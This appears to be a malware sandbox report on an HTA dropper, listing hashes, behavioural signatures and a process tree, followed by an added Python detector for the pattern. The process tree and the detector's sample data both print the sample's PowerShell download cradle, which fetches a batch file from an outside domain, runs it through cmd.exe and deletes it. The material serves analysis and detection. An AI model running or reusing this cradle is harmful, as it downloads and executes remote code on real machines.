Analysis
max time kernel
120s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags
arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
submitted
11/01/2025, 11:42
Static task
static1
Behavioral task
behavioral1
Sample
c2.hta
Resource
win7-20240903-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
c2.hta
Resource
win10v2004-20241007-en
22 signatures
150 seconds
General
Target
c2.hta
Size
1KB
MD5
12f69df4d692549683858d447aba1d01
SHA1
6c4c5d5fcf1a1d9a52f049e18208888855203b29
SHA256
cec517b8225912ac87b826382db2260c6fc5337a4a6323c800b84e14bdaa4670
SHA512
21d914639be0a8c1914f9af752735ebcd5478ca9a39aaa84763477448e0a5f100ea38a73ba9c81b5e22fb8cd4e676bcc98cfc5b064b16deb1b4397829fe25525
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://candwfarmsllc.com/c2.bat
Signatures
Command and Scripting Interpreter: PowerShell 1 IoCs
pid Process
2544 powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe

Modifies Internet Explorer settings 1 IoCs
description ioc Process
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process
2544 powershell.exe
2544 powershell.exe
2544 powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process
Token: SeDebugPrivilege 2544 powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target
PID 1968 wrote to memory of 2544 1968 mshta.exe 30
PID 1968 wrote to memory of 2544 1968 mshta.exe 30
PID 1968 wrote to memory of 2544 1968 mshta.exe 30
PID 1968 wrote to memory of 2544 1968 mshta.exe 30
PID 2544 wrote to memory of 2848 2544 powershell.exe 32
PID 2544 wrote to memory of 2848 2544 powershell.exe 32
PID 2544 wrote to memory of 2848 2544 powershell.exe 32
PID 2544 wrote to memory of 2848 2544 powershell.exe 32
Processes
1. C:\Windows\SysWOW64\mshta.exe
   Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\c2.hta"
   - System Location Discovery: System Language Discovery
   - Modifies Internet Explorer settings
   - Suspicious use of WriteProcessMemory
   PID: 1968
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$url = 'https://candwfarmsllc.com/c2.bat';$output = $env:TEMP + '\temp.bat';Invoke-WebRequest -Uri $url -OutFile $output;Start-Process 'cmd.exe' -ArgumentList '/c', $output -Wait;Remove-Item $output -Force;"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2544
      3. C:\Windows\SysWOW64\cmd.exe
         Command line: "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\temp.bat
         - System Location Discovery: System Language Discovery
         PID: 2848
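The process tree above is the whole story of this sample: mshta.exe runs the HTA, which spawns PowerShell with an inline download cradle (Invoke-WebRequest to %TEMP%\temp.bat), executes the dropped batch file through cmd.exe /c, waits, and deletes it. The following is an added detection example written for this report, not sandbox output or the malware's code. It runs over constructed process-creation records modelled on the tree (image, command line, pid, ppid); the mshta.exe parent pid 1200, the explorer.exe control process, the regexes and the "three or more indicators" threshold are assumptions. It both extracts the dropper config (URL, drop path, execute and cleanup markers) from the PowerShell command line and scores the parent/child chain, so the benign PowerShell session is not flagged.

```python
import re
from collections import defaultdict

# Constructed process-creation records modelled on the process tree in this
# report. Hand-built sample events, not sandbox output; the mshta.exe parent
# pid 1200 and the explorer.exe control process are assumptions.
EVENTS = [
    {"pid": 1968, "ppid": 1200,
     "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmdline": r'C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\c2.hta"'},
    {"pid": 2544, "ppid": 1968,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$url = 'https://candwfarmsllc.com/c2.bat';$output = $env:TEMP + '\temp.bat';Invoke-WebRequest -Uri $url -OutFile $output;Start-Process 'cmd.exe' -ArgumentList '/c', $output -Wait;Remove-Item $output -Force;"'''},
    {"pid": 2848, "ppid": 2544,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\temp.bat'},
    # Benign control: an interactive PowerShell session with no download cradle.
    {"pid": 3100, "ppid": 900,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "Get-Service"'},
    {"pid": 900, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Assumed indicator patterns; extend them for other cradles seen in your environment.
CRADLE = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer", re.I)
URL = re.compile(r"""https?://[^\s'"]+""", re.I)
OUTFILE = re.compile(r"-OutFile\s+([^\s;]+)", re.I)
EXEC_CMD = re.compile(r"Start-Process\s+'?cmd(\.exe)?'?", re.I)
CLEANUP = re.compile(r"Remove-Item|\b(del|erase)\b", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def extract_config(cmdline):
    """Pull URL, drop path and execute/cleanup markers out of a PowerShell command line."""
    url = URL.search(cmdline)
    drop = None
    m = OUTFILE.search(cmdline)
    if m:
        drop = m.group(1)
        if drop.startswith("$"):  # resolve a simple "$var = expr;" assignment
            assign = re.search(re.escape(drop) + r"\s*=\s*([^;]+)", cmdline)
            if assign:
                drop = assign.group(1).strip()
    return {
        "cradle": bool(CRADLE.search(cmdline)),
        "url": url.group(0) if url else None,
        "drop": drop,
        "executes_via_cmd": bool(EXEC_CMD.search(cmdline)),
        "cleanup": bool(CLEANUP.search(cmdline)),
    }


def detect(events):
    """Flag PowerShell that a script host launched to download, run and remove a payload."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    findings = []
    for e in events:
        if basename(e["image"]) not in SHELLS:
            continue
        cfg = extract_config(e["cmdline"])
        parent = by_pid.get(e["ppid"])
        reasons = []
        if parent and basename(parent["image"]) in SCRIPT_HOSTS:
            reasons.append("parent is " + basename(parent["image"]))
        if cfg["cradle"] and cfg["url"]:
            reasons.append("download cradle fetching " + cfg["url"])
        if cfg["executes_via_cmd"]:
            reasons.append("launches cmd.exe on the downloaded file")
        # A child cmd.exe running a .bat out of a Temp directory corroborates the command line.
        for c in children[e["pid"]]:
            low = c["cmdline"].lower()
            if basename(c["image"]) == "cmd.exe" and "\\temp\\" in low and low.rstrip().endswith(".bat"):
                reasons.append(f"child pid {c['pid']} runs {low.split()[-1]}")
        if cfg["cleanup"]:
            reasons.append("removes the payload afterwards")
        if len(reasons) >= 3:  # assumed threshold: any three indicators together
            findings.append({"pid": e["pid"], "url": cfg["url"], "drop": cfg["drop"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"pid {f['pid']}: {f['url']} -> {f['drop']}")
        for r in f["reasons"]:
            print("  -", r)
```

The parent check matters more than any single string match: Invoke-WebRequest in an administrator's console is routine, but PowerShell started by mshta.exe that fetches a file into %TEMP%, hands it to cmd.exe and deletes it is the pattern this report records, and the cmd.exe child gives a second, independent source of evidence when the PowerShell command line is obfuscated or truncated in the log.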